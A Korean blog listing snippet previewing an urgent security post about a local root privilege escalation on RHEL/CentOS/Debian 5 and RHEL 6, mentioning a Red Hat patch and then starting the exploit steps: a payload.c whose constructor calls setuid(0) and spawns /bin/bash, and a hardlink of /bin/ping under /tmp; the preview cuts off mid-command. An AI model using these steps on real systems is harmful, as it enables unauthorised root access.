3-6. 보안 썸네일형 리스트형 [긴급]RHEL/CENTOS/DEBIAN 5 & RHEL 6 / 에서 일반계정으로 쉽게 root 권한 획득하는 문제점 발견 [긴급]RHEL/CENTOS/DEBIAN 5 & RHEL 6 / 에서 일반계정으로 쉽게 root 권한 획득하는 문제점 발견 레드햇 보안 취약성으로 IMPORT 레벨로 일반계정으로 ROOT 권한을 획득할 수 있는 방법과 패치입니다. 패치 방법과 내용은 위의 URL을 참고하세요. >>>절차 일반계정으로 접속후 아래와 같이 명령 진행 $ cd /tmp $ cat > payload.c void __attribute__((constructor)) init() { setuid(0); system("/bin/bash"); } ^D (ctrl +d) $ mkdir /tmp/exploit $ ln /bin/ping /tmp/exploit/target $ exec 3< /tmp/exploit/target $ ls -l /.. 더보기 이전 1 2 3 4 다음